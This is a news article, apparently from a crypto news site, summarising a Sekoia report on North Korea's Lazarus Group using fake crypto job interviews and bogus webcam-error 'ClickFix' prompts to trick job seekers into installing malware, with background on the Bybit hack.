Lazarus Group Evolves Tactics to Target CeFi Job Seekers with ‘ClickFix’ Malware
Lazarus Group Escalates Cyber Attacks with New “ClickFix” Scheme Targeting Crypto Sector Job Seekers
A recent cybersecurity report from Sekoia has uncovered the latest developments in the ongoing cyber threats posed by the infamous Lazarus Group, a hacking collective with strong ties to North Korea. The report reveals that the group has evolved its tactics, now deploying a new strategy known as “ClickFix” to target job seekers in the cryptocurrency sector, particularly those working in centralized finance (CeFi) companies.
This new approach is an extension of the group's earlier campaign, “Contagious Interview,” which had initially focused on recruiting developers and engineers in the fields of artificial intelligence and cryptocurrency. With its latest maneuver, Lazarus appears to be diversifying its target pool, expanding its efforts beyond highly technical professionals to include a broader range of workers in the crypto industry.
Shifting Focus to Non-Technical Professionals
In this fresh wave of cyber attacks, Lazarus has shifted its attention to non-technical professionals, such as individuals in marketing, business development, and other roles that might not involve direct access to the backend code or infrastructure of a company. The attackers impersonate well-known and reputable cryptocurrency firms such as Coinbase, KuCoin, Kraken, and Tether, creating fake job application portals that closely resemble the legitimate sites of these organizations.
The attackers craft highly convincing job offers, luring unsuspecting victims with fake interview invitations. These fraudulent websites often include realistic job application forms and even requests for video introductions, which make the process seem entirely legitimate. The perpetrators go a step further by designing websites with highly convincing errors and prompts that are tailored to induce action from their targets.
The ClickFix Tactic: A Dangerous Deception
The deceptive nature of the “ClickFix” scheme becomes apparent when victims attempt to complete the video introduction process. Once a user begins recording their video, they are met with a fabricated error message, often indicating a malfunction in their webcam or video drivers. The page then encourages the user to run PowerShell commands in an attempt to troubleshoot the problem, a tactic that unknowingly leads to the installation of malware on the user’s system.
This technique has proven to be particularly effective due to its psychological simplicity. Users, believing they are merely resolving a minor technical issue, unknowingly execute malicious code that compromises their system. The psychological manipulation involved plays a crucial role in the success of the attack, as victims tend to trust the prompt, thinking they are fixing a legitimate issue rather than executing malware.
According to Sekoia, the Lazarus group has referenced over 184 fake interview invitations, impersonating at least 14 well-known companies in the cryptocurrency space, thus adding an element of credibility to their schemes. This extensive use of fake job applications and reputable company names further amplifies the threat, making it all the more difficult for job seekers to discern the fraudulent websites from the real ones.
Expanding Target Criteria: Beyond Developers to Business Roles
What is particularly noteworthy about this latest tactic is the shift in Lazarus's targeting strategy. Initially, the group focused primarily on developers and engineers, those with direct access to the technical infrastructure of cryptocurrency firms. However, with the new “ClickFix” campaign, the hackers are expanding their targets to include non-technical personnel, such as marketing professionals and business developers.
This shift suggests that the Lazarus Group is becoming more sophisticated in its approach to social engineering. While many of these non-technical professionals may not have access to code or infrastructure directly, they may still be privy to sensitive internal data or possess the ability to inadvertently facilitate a breach. In other words, the group's expanding target criteria underscores its intent to exploit the professional aspirations of those working in the crypto sector, even if they are not directly involved in the technical operations of the company.
Sekoia’s report also notes that while the “ClickFix” scheme is a new and growing threat, the original “Contagious Interview” campaign remains active. This suggests that Lazarus may be testing the effectiveness of different tactics or tailoring their approach to suit different demographics. In either case, the group's consistent goal remains the same: to deploy info-stealing malware through trusted channels and manipulate victims into self-infection.
Lazarus Group’s Involvement in Major Crypto Hacks
The Lazarus Group’s notorious activities are not limited to phishing schemes and fake job offers. The group has also been linked to several high-profile cyberattacks targeting major cryptocurrency exchanges. Most notably, the Federal Bureau of Investigation (FBI) has officially attributed a $1.5 billion cyberattack on the crypto exchange Bybit to Lazarus.
In this attack, the group used fake job offers to trick Bybit staff into installing compromised trading software known as “TraderTraitor.” This malware was designed to steal private keys and execute illicit transactions on the blockchain, thereby giving the hackers direct access to the exchange's assets. The TraderTraitor malware was built using cross-platform JavaScript and Node.js technologies, making it appear as though the application was legitimate.
Bybit’s attack is just one example of the Lazarus Group’s increasing involvement in targeting the cryptocurrency sector. The group’s persistence and ability to evolve its tactics have made it one of the most formidable threats in the cybersecurity landscape.
The Ongoing Threat of Lazarus Group
As Lazarus continues to refine its methods and expand its targets, the cryptocurrency sector remains on high alert. The recent shift to non-technical professionals highlights a new phase in the group's ongoing evolution, as they continue to adapt their strategies to exploit every possible vulnerability. Their ability to create seemingly legitimate job offers and disguise malicious activity as technical troubleshooting is a testament to their growing sophistication.
For individuals working in the cryptocurrency industry, especially those applying for jobs within this high-risk sector, it is crucial to remain vigilant. Recognizing the signs of a phishing attempt and exercising caution when engaging with unsolicited job offers can help prevent falling victim to these increasingly sophisticated attacks.
The cryptocurrency industry, with its fast-paced growth and lucrative opportunities, continues to be an attractive target for cybercriminals like Lazarus. As the group refines its tactics, it is essential for companies and job seekers alike to stay informed about the evolving threats in order to protect their assets and personal information.
Conclusion: Evolving Threats in the Crypto Space
The Lazarus Group’s activities underscore the constant and evolving threat landscape within the cryptocurrency sector. As cybercriminals adapt and refine their techniques, the need for heightened cybersecurity awareness is more crucial than ever. Whether through fake job offers, phishing scams, or direct attacks on cryptocurrency exchanges, the risk of falling victim to these sophisticated cybercrimes is ever-present.
For those working in the cryptocurrency industry, staying ahead of these threats requires ongoing education, vigilance, and a proactive approach to security. The growing sophistication of the Lazarus Group and similar hacking collectives serves as a reminder that the battle for digital security is ongoing, and only those who are well-prepared will be able to protect themselves from the next wave of cyber threats.
Source: cryptopotato
